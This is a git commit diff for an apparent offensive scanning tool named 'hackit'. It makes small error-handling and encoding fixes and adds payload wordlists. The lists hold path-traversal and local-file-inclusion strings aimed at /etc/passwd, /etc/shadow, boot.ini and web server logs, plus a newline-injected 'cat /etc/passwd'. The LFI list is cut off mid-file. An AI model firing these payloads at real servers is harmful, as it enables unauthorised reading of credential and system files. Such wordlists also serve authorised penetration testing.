[33mcommit 2601072f4ca50b91456151b3e72e416747fd8dfe[m[33m ([m[1;36mHEAD[m[33m -> [m[1;32mmain[m[33m)[m
Author: aniipid <ytaniipid@gmail.com>
Date:   Sat Mar 7 04:28:00 2026 +0700

    upadte cuy

[1mdiff --git a/hackit/__pycache__/cli.cpython-313.pyc b/hackit/__pycache__/cli.cpython-313.pyc[m
[1mindex 78e4a2f..bdee0ff 100644[m
Binary files a/hackit/__pycache__/cli.cpython-313.pyc and b/hackit/__pycache__/cli.cpython-313.pyc differ
[1mdiff --git a/hackit/__pycache__/ui.cpython-313.pyc b/hackit/__pycache__/ui.cpython-313.pyc[m
[1mindex 87a72b0..c2e0cc2 100644[m
Binary files a/hackit/__pycache__/ui.cpython-313.pyc and b/hackit/__pycache__/ui.cpython-313.pyc differ
[1mdiff --git a/hackit/cve/go_bridge.py b/hackit/cve/go_bridge.py[m
[1mindex 344a380..c872688 100644[m
[1m--- a/hackit/cve/go_bridge.py[m
[1m+++ b/hackit/cve/go_bridge.py[m
[36m@@ -22,13 +22,16 @@[m [mclass GoEngine:[m
                 print("[+] Compilation successful")[m
             except subprocess.CalledProcessError as e:[m
                 print(f"[!] Compilation failed: {e}")[m
[31m-                sys.exit(1)[m
[32m+[m[32m                return False[m
             except FileNotFoundError:[m
                 print("[!] Go compiler not found. Please install Go.")[m
[31m-                sys.exit(1)[m
[32m+[m[32m                return False[m
[32m+[m[32m        return True[m
 [m
     def run(self, software, version, output=None):[m
[31m-        self.ensure_compiled()[m
[32m+[m[32m        if not self.ensure_compiled():[m
[32m+[m[32m            print("[!] Engine not available.")[m
[32m+[m[32m            return False[m
         [m
         cmd = [[m
             self.binary_path,[m
[1mdiff --git a/hackit/dir_finder/__init__.py b/hackit/dir_finder/__init__.py[m
[1mindex ac2a641..e2b6851 100644[m
[1m--- a/hackit/dir_finder/__init__.py[m
[1m+++ b/hackit/dir_finder/__init__.py[m
[36m@@ -186,8 +186,8 @@[m [mdef dirfinder(**kwargs):[m
     click.echo("\n[+] Starting Expert Scan...\n")[m
     [m
     try:[m
[31m-        # Execute Go binary and stream output[m
[31m-        process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)[m
[32m+[m[32m        # Execute Go binary and stream output with UTF-8 encoding[m
[32m+[m[32m        process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True, encoding='utf-8', errors='replace')[m
         for line in process.stdout:[m
             print(line, end='')[m
         process.wait()[m
[1mdiff --git a/hackit/dir_finder/analyzer.py b/hackit/dir_finder/analyzer.py[m
[1mindex 273207f..ffd777a 100644[m
[1m--- a/hackit/dir_finder/analyzer.py[m
[1m+++ b/hackit/dir_finder/analyzer.py[m
[36m@@ -73,7 +73,7 @@[m [mclass SmartAnalyzer:[m
                     if 'akamai' in resp.text.lower():[m
                         return "Akamai"[m
                     return "Generic WAF (Blocked Payload)"[m
[31m-            except:[m
[32m+[m[32m            except Exception:[m
                 continue[m
         return "None Detected"[m
 [m
[36m@@ -90,7 +90,7 @@[m [mclass SmartAnalyzer:[m
                 resp = requests.head(urljoin(self.target_url, f), timeout=3, verify=False)[m
                 if resp.status_code == 200:[m
                     self.found_endpoints.add(f)[m
[31m-            except:[m
[32m+[m[32m            except Exception:[m
                 continue[m
 [m
     def run(self):[m
[1mdiff --git a/hackit/dir_finder/db/400_blacklist.txt b/hackit/dir_finder/db/400_blacklist.txt[m
[1mnew file mode 100644[m
[1mindex 0000000..a9cbec4[m
[1m--- /dev/null[m
[1m+++ b/hackit/dir_finder/db/400_blacklist.txt[m
[36m@@ -0,0 +1,9 @@[m
[32m+[m[32m%2e%2e//google.com[m
[32m+[m[32m%ff[m
[32m+[m[32m%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd[m
[32m+[m[32m%2e%2e;/test[m
[32m+[m[32m%3f/[m
[32m+[m[32m%C0%AE%C0%AE%C0%AF[m
[32m+[m[32m../../../../../../etc/passwd[m
[32m+[m[32m..;/[m
[32m+[m[32mcgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd[m
[1mdiff --git a/hackit/dir_finder/db/403_blacklist.txt b/hackit/dir_finder/db/403_blacklist.txt[m
[1mnew file mode 100644[m
[1mindex 0000000..a9cbec4[m
[1m--- /dev/null[m
[1m+++ b/hackit/dir_finder/db/403_blacklist.txt[m
[36m@@ -0,0 +1,9 @@[m
[32m+[m[32m%2e%2e//google.com[m
[32m+[m[32m%ff[m
[32m+[m[32m%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd[m
[32m+[m[32m%2e%2e;/test[m
[32m+[m[32m%3f/[m
[32m+[m[32m%C0%AE%C0%AE%C0%AF[m
[32m+[m[32m../../../../../../etc/passwd[m
[32m+[m[32m..;/[m
[32m+[m[32mcgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd[m
[1mdiff --git a/hackit/dir_finder/db/500_blacklist.txt b/hackit/dir_finder/db/500_blacklist.txt[m
[1mnew file mode 100644[m
[1mindex 0000000..9b078e3[m
[1m--- /dev/null[m
[1m+++ b/hackit/dir_finder/db/500_blacklist.txt[m
[36m@@ -0,0 +1,8 @@[m
[32m+[m[32m%ff[m
[32m+[m[32m%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd[m
[32m+[m[32m%3f/[m
[32m+[m[32m%C0%AE%C0%AE%C0%AF[m
[32m+[m[32m%2e%2e;/test[m
[32m+[m[32m../../../../../../etc/passwd[m
[32m+[m[32m..;/[m
[32m+[m
[1mdiff --git a/hackit/dir_finder/db/LFI-1.txt b/hackit/dir_finder/db/LFI-1.txt[m
[1mnew file mode 100644[m
[1mindex 0000000..1fd791e[m
[1m--- /dev/null[m
[1m+++ b/hackit/dir_finder/db/LFI-1.txt[m
[36m@@ -0,0 +1,930 @@[m
[32m+[m[32m/.../.../.../.../.../[m
[32m+[m[32m\…..\\\…..\\\…..\\\[m
[32m+[m[32m%00../../../../../../etc/passwd[m
[32m+[m[32m%00/etc/passwd%00[m
[32m+[m[32m%00../../../../../../etc/shadow[m
[32m+[m[32m%00/etc/shadow%00[m
[32m+[m[32m%0a/bin/cat%20/etc/passwd[m
[32m+[m[32m%0a/bin/cat%20/etc/shadow[m
[32m+[m[32m/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00[m
[32m+[m[32m%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%  25%5c..%25%5c..%00[m
[32m+[m[32m%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00[m
[32m+[m[32m%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%    25%5c..%25%5c..%255cboot.ini[m
[32m+[m[32m/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini[m
[32m+[m[32m/../../../../../../../../%2A[m
[32m+[m[32m/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini[m
[32m+[m[32m/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd[m
[32m+[m[32m/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow[m
[32m+[m[32m%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd[m
[32m+[m[32m%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/shadow[m
[32m+[m[32m..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd[m
[32m+[m[32m..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow[m
[32m+[m[32m..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed[m
[32m+[m[32m..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd[m
[32m+[m[32m..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow[m
[32m+[m[32m=3D “/..” . “%2f..[m
[32m+[m[32m..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini[m
[32m+[m[32madmin/access_log[m
[32m+[m[32m/admin/install.php[m
[32m+[m[32m../../../administrator/inbox[m
[32m+[m[32m/apache2/logs/access_log[m
[32m+[m[32m/apache2/logs/access.log[m
[32m+[m[32m/apache2/logs/error_log[m
[32m+[m[32m/apache2/logs/error.log[m
[32m+[m[32m/apache/logs/access_log[m
[32m+[m[32m/apache/logs/access.log[m
[32m+[m[32m../../../../../apache/logs/access.log[m
[32m+[m[32m../../../../apache/logs/access.log[m
[32m+[m[32m../../../apache/logs/access.log[m